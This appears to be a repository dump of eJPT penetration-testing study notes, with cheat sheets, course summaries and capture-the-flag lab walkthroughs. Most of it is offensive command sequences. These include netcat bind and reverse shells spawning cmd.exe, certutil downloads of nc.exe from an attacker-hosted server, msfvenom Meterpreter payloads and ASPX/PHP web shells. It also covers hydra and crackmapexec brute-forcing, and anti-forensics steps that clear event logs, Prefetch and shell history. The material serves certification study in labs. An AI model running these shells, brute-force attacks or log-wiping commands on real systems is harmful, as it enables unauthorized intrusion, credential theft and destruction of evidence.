├── Cheat-Sheets ├── Clearing Tracks - Linux.md ├── Clearing Tracks - Windows.md ├── Bind shells.md ├── Upgrading Shells.md ├── T1046.md ├── Fixing Exploits - Manual (RCE).md ├── Reverse Shells.md ├── WinRM.md ├── RDP.md ├── SNMP.md ├── Persistence - Linux.md ├── Transfer Files.md ├── Dumping Hashes - Linux.md ├── SSH.md ├── SMTP.md ├── Pivoting.md ├── Dumping Hashes - Windows.md ├── Persistence - Windows.md ├── FTP.md ├── Common Wordlists & Tools.md ├── Enumeration - Windows.md ├── SQL.md ├── Enumeration - Linux.md ├── Privilege Escalation - Windows.md ├── SMB - SAMBA.md ├── Privilege Escalation - Linux.md └── HTTP.md ├── Course-Notes ├── 12. Introduction to the Web & HTTP Protocol.md ├── 11. Social Engineering.md ├── 04. Vulnerability Assessment.md ├── 05. Auditing Fundamentals.md ├── 01. Information Gathering.md ├── 07. Network-Based Attacks.md ├── 06b. System & Host Based Attacks - Linux.md └── 02. Footprinting and Scanning.md ├── Skill-Check ├── 14. Host & Network Penetration Testing - Post-Exploitation CTF_2.md ├── 15. Web Application Penetration Testing.md ├── 13. Host & Network Penetration Testing - Post-Exploitation CTF_1.md ├── 11. Host & Network Penetration Testing - Exploitation CTF_2.md ├── 12. Host & Network Penetration Testing - Exploitation CTF_3.md ├── 10. Host & Network Penetration Testing - Exploitation CTF_1.md ├── 9. Host & Network Penetration Testing - The Metasploit Framework CTF_2.md ├── 8. Host & Network Penetration Testing - The Metasploit Framework CTF_1.md ├── 4. Assessment Methodologies - Vulnerability Assessment.md ├── 1. Assessment Methodologies - Information Gathering.md ├── 7. Host & Network Penetration Testing - Network-Based Attacks CTF_1.md ├── 2. Assessment Methodologies - Footprinting and Scanning.md ├── 6. Host & Network Penetration Testing - System-Host Based Attacks CTF_2.md ├── 3. Assessment Methodologies - Enumeration.md └── 5. Host & Network Penetration Testing - System-Host Based Attacks CTF_1.md ├── Course Notes Index.md ├── Skill-Check.md ├── eJPT - Cheat Sheets.md └── README.md /Cheat-Sheets/Clearing Tracks - Linux.md: -------------------------------------------------------------------------------- 1 | ```shell 2 | history -c && history -w 3 | # This clears the session history and saves the empty history file 4 | 5 | clearev 6 | # Clear event logs (stay away unless specified) 7 | 8 | history -c 9 | # Clear the bash history 10 | 11 | cat /dev/null > ~/.bash_history 12 | # This is a quick way to wipe the saved command history without deleting the file itself 13 | ``` 14 | 15 | > **Note** 16 | > Linux servers may forward logs remotely (e.g., to a SIEM), so local deletion may not be enough. 17 | > Aggressive log removal often raises red flags. 18 | > More advanced attackers may edit logs instead of deleting them to avoid suspicion. 19 | -------------------------------------------------------------------------------- /Course-Notes/12. Introduction to the Web & HTTP Protocol.md: -------------------------------------------------------------------------------- 1 | # Web Application Penetration Testing: Introduction to the Web & HTTP Protocol 2 | 3 | As a Penetration Tester, it is vitally important to understand how web applications work, how they are secured, how they communicate with web browsers, the threats/vulnerabilities affecting modern web applications, and how to perform a professional security assessment on web applications. This course will provide a solid understanding of essential web application security concepts and practices, including common attack vectors, security risks, and the importance of secure coding practices. It also covers important aspects of web application architecture, the technologies and components that make up a web application stack, and how browsers and web applications communicate with each other over HTTP/S. 4 | 5 | 6 | -------------------------------------------------------------------------------- /Skill-Check/14. Host & Network Penetration Testing - Post-Exploitation CTF_2.md: -------------------------------------------------------------------------------- 1 | ## Host & Network Penetration Testing: Post-Exploitation CTF 2 2 | 3 | ### Q1. An insecure ssh user named alice lurks in the system. 4 | **Resolution:** 5 | Brute-force Alice’s password with Hydra, SSH as Alice, and read flag. 6 | 7 | ### Q2. Using the hashdump file discovered in the previous challenge, can you crack the hashes and compromise a user? 8 | **Resolution:** 9 | Crack NTLM hashes from `hashdump.txt` with John the Ripper. SSH as cracked user, read flag. 10 | 11 | ### Q3. Can you escalate privileges and read the flag in C://Windows//System32//config directory? 12 | **Resolution:** 13 | Check privileges with `whoami /priv`. Use PrintSpoofer to exploit SeImpersonatePrivilege, escalate to SYSTEM, and read config flag. 14 | 15 | ### Q4. Looks like the flag present in the Administrator’s home denies direct access. 16 | **Resolution:** 17 | Adjust permissions with `icacls` to remove deny for SYSTEM. Access the flag. 18 | -------------------------------------------------------------------------------- /Cheat-Sheets/Clearing Tracks - Windows.md: -------------------------------------------------------------------------------- 1 | Clearing tracks on a Windows system after exploitation is often part of anti-forensics or post-exploitation cleanup. Whenever you successfully gain access to a Windows target, all of your activity is being logged in the form of Windows events. Meterpreter provides you with the ability to clear the entire Windows Event log. This can be done by running the following commands: 2 | 3 | ```shell 4 | clearev # meterpreter 5 | # This command clears the Application, System, and Security event logs 6 | 7 | rm -f C:\\Windows\\Prefetch\\* 8 | # Deletes files that show what was executed recently 9 | 10 | rm -f C:\\Users\\\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt 11 | # If you spawned a shell or PowerShell from Meterpreter 12 | ``` 13 | 14 | Always check your session privileges (getuid, getprivs) — you may need SYSTEM or Administrator rights for full cleanup. Avoid overdoing it: aggressive log clearing is suspicious and often triggers alerts. 15 | -------------------------------------------------------------------------------- /Cheat-Sheets/Bind shells.md: -------------------------------------------------------------------------------- 1 | A **bind shell** is a remote shell where the attacker connects to a listener on the target system; though often blocked or flagged, it's important to understand how it works and how to set it up using Netcat. 2 | In order to setup a bind shell with Netcat, we will need to transfer the nc.exe executable to the target system. 3 | 4 | ```shell 5 | # The first step will involve navigating to the /usr/share/windows-binaries directory 6 | cd /usr/share/windows-binaries/ 7 | 8 | # We can then setup an HTTP server with Python within this directory by running the following command 9 | python -m SimpleHTTPServer 80 10 | 11 | # You will then need to open up a command prompt, navigate to the Desktop directory and run the following command to download the nc.exe executable from the web server being hosted on the Kali Linux system 12 | certutil -urlcache -f http:///nc.exe nc.exe 13 | 14 | # Setting up the bind shell listener on the Windows system 15 | .\nc.exe -nvlp 1234 -e cmd.exe 16 | 17 | # Back to Kali shell 18 | nc -nv 1234 19 | ``` 20 | -------------------------------------------------------------------------------- /Skill-Check/15. Web Application Penetration Testing.md: -------------------------------------------------------------------------------- 1 | ## Web Application Penetration Testing CTF 1 2 | 3 | ### Q1. Sometimes, important files are hidden in plain sight. Check the root (‘/’) directory for a file named ‘flag.txt’ that might hold the key to the first flag. 4 | **Resolution:** 5 | Test for LFI by modifying file parameter in URL to `../../flag.txt` and retrieve the flag. 6 | 7 | ### Q2. Explore the structure of the server’s directories. Enumeration might reveal hidden treasures. 8 | **Resolution:** 9 | Fuzz directories with Dirb, find `/secured/`, and retrieve flag from `/secured/flag.txt`. 10 | 11 | ### Q3. The login form seems a bit weak. Trying out different combinations might just reveal the next flag. 12 | **Resolution:** 13 | Brute-force login with Hydra using common usernames and passwords to obtain credentials and flag. 14 | 15 | ### Q4. The login form behaves oddly with unexpected inputs. Think of injection techniques to access the ‘admin’ account and find the flag. 16 | **Resolution:** 17 | Exploit SQL injection by logging in with `admin'--` as username to bypass authentication and retrieve the flag. 18 | -------------------------------------------------------------------------------- /Skill-Check/13. Host & Network Penetration Testing - Post-Exploitation CTF_1.md: -------------------------------------------------------------------------------- 1 | ## Host & Network Penetration Testing: Post-Exploitation CTF 1 2 | 3 | ### Q1. The file that stores user account details is worth a closer look. (target1.ine.local) 4 | **Resolution:** 5 | Exploit libssh with Metasploit. Read `/etc/passwd` for flag. 6 | 7 | ### Q2. User groups might reveal more than you expect. 8 | **Resolution:** 9 | Read `/etc/group` file. 10 | 11 | ### Q3. Scheduled tasks often have telling names. Investigate the cron jobs to uncover the secret. 12 | **Resolution:** 13 | Check `/etc/cron.d` directory for flag. 14 | 15 | ### Q4. DNS configurations might point you in the right direction. Also, explore the home directories for stored credentials. 16 | **Resolution:** 17 | Check `/etc/resolv.conf` and `/etc/hosts` for flag. 18 | 19 | ### Q5. Use the discovered credentials to gain higher privileges and explore the root’s home directory on target2.ine.local. 20 | **Resolution:** 21 | Read credentials in home directory, SSH as new user, exploit writable `/etc/shadow` (add password to root), use `su` to escalate, and access `/root`. 22 | -------------------------------------------------------------------------------- /Skill-Check/11. Host & Network Penetration Testing - Exploitation CTF_2.md: -------------------------------------------------------------------------------- 1 | ## Host & Network Penetration Testing: Exploitation CTF 2 2 | 3 | ### Q1. Looks like smb user tom has not changed his password from a very long time. 4 | **Resolution:** 5 | Nmap reveals SMB on port 445. Use CrackMapExec to brute-force Tom’s password, then enumerate accessible shares with SMBMap. Connect and read files. 6 | 7 | ### Q2. Using the NTLM hash list discovered in the previous challenge, can you compromise the smb user nancy? 8 | **Resolution:** 9 | Use the leaked NTLM hashes with Metasploit’s `scanner/smb/smb_login` module to authenticate as Nancy. Interact with the session, list shares, and download/read flag files. 10 | 11 | ### Q3. I wonder what the hint found in the previous challenge be useful for! 12 | **Resolution:** 13 | Use discovered credentials to access the FTP service. Log in and retrieve the flag file. 14 | 15 | ### Q4. Can you compromise the target machine and retrieve the C://flag4.txt file? 16 | **Resolution:** 17 | Upload an ASPX shell to the FTP (IIS webroot), launch a Meterpreter handler, access the shell via browser, and read the flag. 18 | -------------------------------------------------------------------------------- /Cheat-Sheets/Upgrading Shells.md: -------------------------------------------------------------------------------- 1 | When you gain initial access to a target system, the shell you get is often limited — lacking features like tab completion, proper signal handling (e.g., Ctrl+C), or full TTY (interactive terminal) support. **Upgrading a shell** means turning this basic shell into a **fully interactive, stable shell** so you can work more effectively on the system. 2 | 3 | **Check Available Shells** 4 | 5 | ```shell 6 | cat /etc/shells 7 | # Lists all valid login shells available on the system 8 | ``` 9 | 10 | **Start an Interactive Bash Session** 11 | 12 | ```shell 13 | /bin/bash -i 14 | # Launches an interactive instance of Bash 15 | ``` 16 | 17 | **Spawn a TTY Shell Using Python** 18 | 19 | ```shell 20 | python --version 21 | python -c 'import pty; pty.spawn("/bin/bash")' 22 | # Uses Python to spawn a pseudo-terminal with Bash. 23 | 24 | # If Python 2 isn’t available, try: 25 | python3 --version 26 | python3 -c 'import pty; pty.spawn("/bin/bash")' 27 | ``` 28 | 29 | **Alternative with Perl** 30 | 31 | ```shell 32 | perl -e 'exec "/bin/bash";' 33 | # Uses Perl to execute a new Bash shell 34 | ``` 35 | 36 | **Alternative with Ruby** 37 | 38 | ```shell 39 | ruby -e 'exec "/bin/bash"' 40 | # Runs Bash through Ruby if available 41 | ``` 42 | 43 | -------------------------------------------------------------------------------- /Cheat-Sheets/T1046.md: -------------------------------------------------------------------------------- 1 | **T1046 (Network Service Scanning)** is a technique defined in the **MITRE ATT&CK framework**, used to describe a type of reconnaissance activity where an attacker scans a network to discover open services or active ports on systems. 2 | 3 | # Using NMAP 4 | 5 | ```shell 6 | # Uploads the local nmap binary from your machine to the /tmp directory on the target system 7 | upload /root/static-binaries/nmap /tmp/nmap 8 | shell 9 | chmod +x /tmp/nmap 10 | ./nmap -p- 11 | ``` 12 | 13 |
14 | 15 | # Using Bash Script 16 | 17 | ```shell 18 | # Save the following script as bash-port-scanner.sh 19 | 20 | #!/bin/bash 21 | for port in {1..1000}; do 22 | timeout 1 bash -c "echo >/dev/tcp/$1/$port" 2>/dev/null && echo "port $port is open" 23 | done 24 | 25 | # Upload the bash script on the target machine 26 | upload /root/bash-port-scanner.sh /tmp/bash-port-scanner.sh 27 | shell 28 | chmod +x ./bash-port-scanner.sh 29 | ./bash-port-scanner.sh 30 | ``` 31 | 32 |
33 | 34 | # Using Metasploit Module 35 | 36 | ```shell 37 | run autoroute -s 38 | use auxiliary/scanner/portscan/tcp 39 | set RHOSTS 40 | set VERBOSE false 41 | set PORTS 42 | exploit 43 | -------------------------------------------------------------------------------- /Cheat-Sheets/Fixing Exploits - Manual (RCE).md: -------------------------------------------------------------------------------- 1 | Use Searchsploit to find public exploits and modify them as needed to ensure they work in your target environment. 2 | 3 | ```shell 4 | nmap -sV 5 | # Scan for open ports and detect services 6 | 7 | searchsploit HTTP File Server 2.3 8 | # Search for known exploits in Exploit-DB 9 | 10 | searchsploit -m 39161 11 | # Copy exploit 39161 to the current directory 12 | 13 | vim 39161.py 14 | # This exploit requires you to change the local IP and local port values 15 | # ip_addr 16 | # local_port 17 | 18 | cp /usr/share/windows-resources/binaries/nc.exe /root/Desktop/ 19 | # Prepare Netcat binary to be served 20 | 21 | cd /root/Desktop 22 | # Go to the directory where the server will run 23 | 24 | python -m SimpleHTTPServer 80 25 | # Terminal 1 26 | # Start a web server to host nc.exe 27 | 28 | nc -nvlp 29 | # Terminal 2 30 | # Open a Netcat listener to catch the shell 31 | 32 | python 39161.py 80 33 | # Terminal 3 34 | # Run the exploit against the vulnerable target 35 | 36 | # If the exploit script runs successfully, we should receive a reverse shell on our Netcat listener 37 | whoami 38 | # Check current user on the remote system 39 | 40 | systeminfo 41 | # Display system information from the target 42 | ``` 43 | 44 | -------------------------------------------------------------------------------- /Skill-Check/12. Host & Network Penetration Testing - Exploitation CTF_3.md: -------------------------------------------------------------------------------- 1 | ## Host & Network Penetration Testing: Exploitation CTF 3 2 | 3 | ### Q1. A vulnerable service maybe running on target1.ine.local. If exploitable, retrieve the flag from the root directory. 4 | **Resolution:** 5 | Nmap reveals FTP (ProFTPD 1.3.5). Use searchsploit to find exploit, use Metasploit to exploit ProFTPD and get shell. Read the root flag. 6 | 7 | ### Q2. Further, a quick interaction with a local network service on target1.ine.local may reveal this flag. Use the hint given in the previous flag. 8 | **Resolution:** 9 | Enumerate local ports (e.g., with netstat). Use netcat to connect to service (e.g., port 8888). Use hint passphrase to get the flag. 10 | 11 | ### Q3. A misconfigured service running on target2.ine.local may help you gain access to the machine. Can you retrieve the flag from the root directory? 12 | **Resolution:** 13 | Nmap shows HTTP and SMB. Use enum4linux to find uploadable share. Upload PHP shell, set Netcat listener, trigger the shell via browser, and read root flag. 14 | 15 | ### Q4. Can you escalate to root on target2.ine.local and read the flag from the restricted /root directory? 16 | **Resolution:** 17 | Enumerate available shells and SetUID binaries for privilege escalation. Use suitable binary (e.g., /bin/rbash) to spawn a root shell and read the flag. 18 | -------------------------------------------------------------------------------- /Skill-Check/10. Host & Network Penetration Testing - Exploitation CTF_1.md: -------------------------------------------------------------------------------- 1 | ## Host & Network Penetration Testing: Exploitation CTF 1 2 | 3 | ### Q1. Identify and exploit the vulnerable web application running on target1.ine.local and retrieve the flag from the root directory. The credentials admin:password1 may be useful. 4 | **Resolution:** 5 | Nmap scan identifies Flatcore CMS with login form. Log in with provided credentials. Use searchsploit to find an RCE exploit, copy and execute it, then list root directory and read the flag. 6 | 7 | ### Q2. Further, identify and compromise an insecure system user on target1.ine.local. 8 | **Resolution:** 9 | List `/home` for users (e.g., `iamaweakuser`). Use Hydra to brute-force SSH with common passwords. Log in and read the flag file. 10 | 11 | ### Q3. Identify and exploit the vulnerable plugin used by the web application running on target2.ine.local and retrieve the flag3.txt file from the root directory. 12 | **Resolution:** 13 | Nmap scan, identify WordPress. Use wpscan/nikto/gobuster to find plugins (e.g., Duplicator). Use Metasploit module for arbitrary file read to get the flag. 14 | 15 | ### Q4. Further, identify and compromise a system user requiring no authentication on target2.ine.local. 16 | **Resolution:** 17 | During /etc/passwd read, find user (e.g., `iamacrazyfreeuser`) with no password. SSH into account and read the flag. 18 | -------------------------------------------------------------------------------- /Skill-Check/9. Host & Network Penetration Testing - The Metasploit Framework CTF_2.md: -------------------------------------------------------------------------------- 1 | ## Host & Network Penetration Testing: The Metasploit Framework CTF 2 2 | 3 | ### Q1. Enumerate the open port using Metasploit, and inspect the RSYNC banner closely; it might reveal something interesting. 4 | **Resolution:** 5 | Run Nmap to identify open RSYNC port. 6 | Connect: 7 | ```bash 8 | rsync rsync://target1.ine.local 9 | ``` 10 | List available modules/shares. 11 | 12 | ### Q2. The files on the RSYNC server hold valuable information. Explore the contents to find the flag. 13 | **Resolution:** 14 | List and download files from the discovered RSYNC module: 15 | ```bash 16 | rsync -av rsync://target1.ine.local/backupwscohen/ . 17 | ``` 18 | Read through the files for valuable information. 19 | 20 | ### Q3. Try exploiting the webapp to gain a shell using Metasploit on target2.ine.local. 21 | **Resolution:** 22 | Nmap scan reveals a web service (Roxy-WI). Search for a relevant exploit in Metasploit, set RHOSTS and LHOST, and run the exploit. Open an interactive shell, navigate to the root directory, and read the flag. 23 | 24 | ### Q4. Automated tasks can sometimes leave clues. Investigate scheduled jobs or running processes to uncover the hidden flag. 25 | **Resolution:** 26 | Check the `/etc` directory for cron jobs, specifically in `cron.d`. Read any relevant files (e.g., `www-data-cron`) to uncover the flag. 27 | -------------------------------------------------------------------------------- /Skill-Check/8. Host & Network Penetration Testing - The Metasploit Framework CTF_1.md: -------------------------------------------------------------------------------- 1 | ## Host & Network Penetration Testing: The Metasploit Framework CTF 1 2 | 3 | ### Q1. Gain access to the MSSQLSERVER account on the target machine to retrieve the first flag. 4 | **Resolution:** 5 | Run Nmap: 6 | ```bash 7 | nmap -sC -sV --min-rate 1000 target.ine.local 8 | ``` 9 | Identify MSSQL on port 1433. Use Metasploit, select the suitable exploit, set RHOSTS, and adjust payload for the system's architecture. Run the exploit to get a Meterpreter shell. Interact with the shell, navigate to `C:\` and read the flag file. 10 | 11 | ### Q2. Locate the second flag within the Windows configuration folder. 12 | **Resolution:** 13 | Navigate to `Windows\System32`, list directories, enter the `config` folder. If access is denied, use Meterpreter's `getprivs` or `getsystem` to elevate privileges. Re-enter the shell and access the config folder to read the flag. 14 | 15 | ### Q3. The third flag is also hidden within the system directory. Find it to uncover a hint for accessing the final flag. 16 | **Resolution:** 17 | Search for `.txt` files in System32 and subfolders: 18 | ```bash 19 | dir C:\Windows\System32\*.txt /s /b 20 | ``` 21 | Locate the flag file and read its contents. 22 | 23 | ### Q4. Investigate the Administrator directory to find the fourth flag. 24 | **Resolution:** 25 | After privilege escalation, navigate to the Administrator's Desktop and read the flag file. 26 | 27 | -------------------------------------------------------------------------------- /Skill-Check/4. Assessment Methodologies - Vulnerability Assessment.md: -------------------------------------------------------------------------------- 1 | ## Assessment Methodologies: Vulnerability Assessment 2 | 3 | ## Questions and Resolutions 4 | 5 | ### Q1. Explore hidden directories for version control artifacts that might reveal valuable information. 6 | 7 | **Resolution:** 8 | Start with an nmap script and version scan to identify potential vulnerabilities: 9 | ```bash 10 | nmap -sC -sV target.ine.local --script vuln --min-rate 1000 11 | ``` 12 | Check for accessible version control directories such as `.git` on the web server. If accessible, navigate inside to investigate. 13 | 14 | ### Q2. The data storage has some loose security measures. Can you find the flag hidden within it? 15 | 16 | **Resolution:** 17 | From the nmap results, check for publicly accessible phpMyAdmin. 18 | Navigate to the phpMyAdmin panel in the browser, look for the `mysql` database, and review the `secret_info` table for sensitive information. 19 | 20 | ### Q3. A PHP file that displays server information might be worth examining. What could be hidden in plain sight? 21 | 22 | **Resolution:** 23 | Use nmap’s `http-enum` script output to find interesting files. 24 | If a `phpinfo.php` file is present, visit it in your browser to examine what information it reveals. 25 | 26 | ### Q4. Sensitive directories might hold critical information. Search through carefully for hidden gems. 27 | 28 | **Resolution:** 29 | Review nmap and enumeration results for sensitive directories (e.g., `passwords`). 30 | Navigate to such directories and inspect files like `flag.txt` for important data. 31 | -------------------------------------------------------------------------------- /Skill-Check/1. Assessment Methodologies - Information Gathering.md: -------------------------------------------------------------------------------- 1 | ## Assessment Methodologies: Information Gathering 2 | 3 | ## Questions and Resolutions 4 | 5 | ### Q1. This tells search engines what to and what not to avoid. 6 | 7 | **Resolution:** 8 | The `robots.txt` file tells search engines what to crawl and what to avoid. 9 | 10 | ### Q2. What website is running on the target, and what is its version? 11 | 12 | **Resolution:** 13 | Use Nmap to identify the server and its version: 14 | ```bash 15 | nmap target.ine.local -sC -sV 16 | ``` 17 | 18 | ### Q3. Directory browsing might reveal where files are stored. 19 | 20 | **Resolution:** 21 | Brute-force directories using a tool like `dirb`. 22 | Check the `wp-content/uploads` directory for interesting files. 23 | 24 | ### Q4. An overlooked backup file in the webroot can be problematic if it reveals sensitive configuration details. 25 | 26 | **Resolution:** 27 | Search for backup files using common extensions (`.bak`, `.tar.gz`, `.zip`, `.sql`, `.bak.zip`) with a command like: 28 | ```bash 29 | dirb http://target.ine.local -w /usr/share/dirb/wordlists/big.txt -X .bak,.tar.gz,.zip,.sql,.bak.zip 30 | ``` 31 | Retrieve the contents using curl: 32 | ```bash 33 | curl http://target.ine.local/wp-config.bak 34 | ``` 35 | 36 | ### Q5. Certain files may reveal something interesting when mirrored. 37 | 38 | **Resolution:** 39 | Mirror the website using `httrack` to find hidden or interesting files: 40 | ```bash 41 | httrack http://target.ine.local -O target.html 42 | ``` 43 | Navigate to the mirrored directory and look for unusual files (e.g., `xmlrpc0db0.php`). 44 | -------------------------------------------------------------------------------- /Course-Notes/11. Social Engineering.md: -------------------------------------------------------------------------------- 1 | # Social Engineering 2 | 3 | **What is Social Engineering (SE)?** 4 | 5 | Social engineering is the act of manipulating people into giving up confidential information or performing actions that help an attacker compromise a system. In the eJPT context, it's introduced as a potential entry point during the pre-exploitation phase. 6 | 7 | **Common Social Engineering Techniques** 8 | 9 | - **Phishing**: Sending fake emails or links that trick users into entering credentials or executing malicious payloads. 10 | - **Spear Phishing**: A more targeted version of phishing, aimed at specific individuals or roles. 11 | - **Vishing**: Voice-based attacks, like impersonating IT support over the phone. 12 | - **Pretexting**: Creating a fake scenario to gain trust and extract information. 13 | - **Tailgating**: Following someone into a restricted area to gain physical access. 14 | - **Baiting**: Leaving infected USBs or files for a target to find and open. 15 | 16 | **Tools You Should Be Aware Of** 17 | 18 | - **Social Engineering Toolkit (SET)**: A popular tool to generate phishing pages, payloads, or fake login portals. 19 | - **msfvenom**: Used to craft malicious executables or payload-bearing documents.. 20 | - **BeEF**: A browser exploitation framework used in client-side attacks. 21 | - **Gophish**: A framework for running phishing campaigns (educational or simulated). 22 | - **SpoofEmail**: For creating fake email headers or simulating phishing attacks in labs. 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | -------------------------------------------------------------------------------- /Skill-Check/7. Host & Network Penetration Testing - Network-Based Attacks CTF_1.md: -------------------------------------------------------------------------------- 1 | ## Host & Network Penetration Testing: Network-Based Attacks CTF 1 2 | 3 | ### Q1. What is the URL accessed by the infected user that returned a 200 OK response code? 4 | **Resolution:** 5 | Open the `test.pcap` file in Wireshark. Use filter: `http.response.code == 200` to find HTTP responses with 200 OK. Check the Request URI parameter to identify the accessed URL. 6 | 7 | ### Q2. What is the IP address, MAC address of the infected Windows client? 8 | **Resolution:** 9 | Use Wireshark filter `http` to see HTTP traffic and find the relevant IP and MAC address. Check the source of a Windows Defender request. 10 | 11 | ### Q3. Which Wireshark filter can you use to determine the victim’s hostname from NetBIOS Name Service traffic, and what is the detected hostname for this malware infection? 12 | **Resolution:** 13 | Use Wireshark filter `nbns` to display NetBIOS Name Service traffic and identify the victim's hostname by expanding the Queries section. 14 | 15 | ### Q4. Which user got infected and ran the mystery_file.ps1 PowerShell script? 16 | **Resolution:** 17 | Search for `mystery_file.ps1` using CTRL+F (String, Packet bytes). Extract and enumerate the content to find the username. 18 | 19 | ### Q5. What User-Agent string indicates the traffic generated by a PowerShell script? 20 | **Resolution:** 21 | Search for `PowerShell` in Packet Details. The User-Agent will include "WindowsPowerShell". 22 | 23 | ### Q6. Which wallet extension ID is associated with the Coinbase wallet? 24 | **Resolution:** 25 | Search for "Coinbase" in Packet Bytes, follow the related TCP stream, and extract the extension ID. 26 | 27 | -------------------------------------------------------------------------------- /Skill-Check/2. Assessment Methodologies - Footprinting and Scanning.md: -------------------------------------------------------------------------------- 1 | ## Assessment Methodologies: Footprinting and Scanning 2 | 3 | ## Questions and Resolutions 4 | 5 | ### Q1. The server proudly announces its identity in every response. Look closely; you might find something unusual. 6 | 7 | **Resolution:** 8 | Use Nmap to gather details about the server. 9 | ```bash 10 | nmap target.ine.local -sC -sV 11 | ``` 12 | Alternatively, check the browser’s Network tab for server identity information. 13 | 14 | ### Q2. The gatekeeper’s instructions often reveal what should remain unseen. Don’t forget to read between the lines. 15 | 16 | **Resolution:** 17 | After performing the Nmap scan, check the `robots.txt` file for disallowed entries. 18 | Use curl to access `/secret-info/`, then curl to `flag.txt` inside that directory. 19 | 20 | ### Q3. Anonymous access sometimes leads to forgotten treasures. Connect and explore the directory; you might stumble upon something valuable. 21 | 22 | **Resolution:** 23 | If Nmap reveals an open FTP server with anonymous login: 24 | Connect with 25 | ```bash 26 | ftp target.ine.local 27 | ``` 28 | Login with `anonymous` as both username and password. 29 | Transfer the files found with `get` command, then read their contents with `cat` after exiting FTP. 30 | 31 | ### Q4. A well-named database can be quite revealing. Peek at the configurations to discover the hidden treasure. 32 | 33 | **Resolution:** 34 | After retrieving credentials from transferred files, connect to the MySQL server (open on port 3306) with: 35 | ```bash 36 | mysql -u db_admin -p -h target.ine.local 37 | ``` 38 | Once connected, list all databases: 39 | ```bash 40 | show databases; 41 | ``` 42 | -------------------------------------------------------------------------------- /Cheat-Sheets/Reverse Shells.md: -------------------------------------------------------------------------------- 1 | A **reverse shell** is a remote shell where the target connects back to the attacker's listener; it's effective since no tools are needed on the target, but embedding the attacker's IP in the payload can expose them during forensic analysis. 2 | 3 | ```shell 4 | # Start a simple HTTP server on Kali to host nc.exe 5 | cd /usr/share/windows-binaries 6 | python -m SimpleHTTPServer 80 7 | 8 | # Download nc.exe on the Windows Target 9 | certutil -urlcache -f http:///nc.exe nc.exe 10 | 11 | # Set Up Netcat Listener on Kali (Attacker) - Starts a Netcat listener on port 1234 to receive the reverse shell 12 | nc -nvlp 1234 13 | 14 | # Connect Back to Kali from Windows (Reverse Shell) 15 | nc.exe -nv 1234 -e cmd.exe 16 | # Connects back to the Kali listener and spawns a Windows cmd shell 17 | 18 | # On the Kali system we can: 19 | whoami 20 | ``` 21 | 22 | **ASPX shell** 23 | 24 | ```shell 25 | # Let’s create the ASPX shell using msfvenom 26 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=1234 -f aspx > shell.aspx 27 | 28 | # Upload the shell on the target. 29 | 30 | # Use the msfconsole module /multi/handler to handle the incoming connection. 31 | # Set these three parameters: PAYLOAD , LHOST , and LPORT 32 | use multi/handler 33 | set PAYLOAD windows/x64/meterpreter/reverse_tcp 34 | set LHOST 35 | set LPORT 36 | 37 | # Navigate to http:///shell.aspx 38 | # You should observe that we have successfully obtained the shell. 39 | ``` 40 | 41 | **PHP reverse shell** 42 | 43 | ```shell 44 | cp /usr/share/webshells/php/php-reverse-shell.php . 45 | # Update the IP address with my IP 46 | # Update port number. 47 | 48 | # e.g. Upload the file to SMB (target) using the put command. 49 | 50 | # Start a Netcat listener 51 | nc -lvnp 1234 52 | 53 | # Open the browser 54 | http:///php-reverse-shell.php 55 | ``` 56 | -------------------------------------------------------------------------------- /Cheat-Sheets/WinRM.md: -------------------------------------------------------------------------------- 1 | # WinRM 2 | 3 | **WinRM (Windows Remote Management)** 4 | **Description**: Protocol for remote command execution on Windows via HTTP(S), often used by admins and attackers alike. 5 | **Ports**: TCP 5985 (HTTP), 5986 (HTTPS) 6 | 7 |
8 | 9 | # Enumeration with CrackMapExec (CME) 10 | 11 | ```shell 12 | # Check WinRM availability 13 | crackmapexec winrm -p 14 | 15 | # Brute-force with username and password list 16 | crackmapexec winrm -u administrator -p 17 | 18 | # Test single credentials + run remote commands 19 | crackmapexec winrm -u -p -x "whoami" 20 | crackmapexec winrm -u -p -x "systeminfo" 21 | ``` 22 | 23 |
24 | 25 | # Remote Shell Access with Evil-WinRM 26 | 27 | ```shell 28 | evil-winrm -u administrator -p '' -i 29 | # Connects to a Windows target over WinRM using specified credentials. 30 | # Opens a remote PowerShell session for post-exploitation and privilege escalation. 31 | ``` 32 | 33 |
34 | 35 | # Enumeration & Exploitation with Metasploit 36 | 37 | ```shell 38 | use auxiliary/scanner/winrm/winrm_auth_methods 39 | # Lists available authentication methods supported by the WinRM service (e.g., Basic, NTLM, Kerberos). 40 | 41 | use auxiliary/scanner/winrm/winrm_login 42 | # Attempts brute-force login on WinRM using username and password files. 43 | set PASSWORD anything 44 | # Sets a default password (used if PASS_FILE is not set). 45 | # set USER_FILE → Path to file with usernames. 46 | # set PASS_FILE → Path to file with passwords. 47 | 48 | use auxiliary/scanner/winrm/winrm_cmd 49 | # Executes remote PowerShell commands over WinRM. 50 | set CMD whoami 51 | # Sets the command to be executed on the target. 52 | 53 | use exploit/windows/winrm/winrm_script_exec 54 | # Executes a malicious VBS script on the target using WinRM. 55 | set FORCE_VBS true 56 | # Forces the use of a VBS payload for execution. 57 | ``` 58 | -------------------------------------------------------------------------------- /Cheat-Sheets/RDP.md: -------------------------------------------------------------------------------- 1 | # RDP 2 | 3 | **RDP (Remote Desktop Protocol)** 4 | **Description**: RDP (Remote Desktop Protocol) allows remote graphical access to Windows systems 5 | **Ports**: TCP 3389 6 | **Known Vulnerabilities**: Weak credentials, BlueKeep vulnerability (CVE-2019-0708) 7 | 8 |
9 | 10 | # Check and Enable RDP 11 | 12 | ```shell 13 | use auxiliary/scanner/rdp/rdp_scanner # Check for exposed RDP services 14 | 15 | # Enabling the RDP service using windows post exploitation module 16 | use post/windows/manage/enable_rdp 17 | set SESSION 18 | ``` 19 | 20 |
21 | 22 | # Brute-force 23 | 24 | ```shell 25 | hydra -L -P rdp://: 26 | hydra -L -P rdp://: -s # Use -s if port ≠ 3389 27 | ``` 28 | 29 |
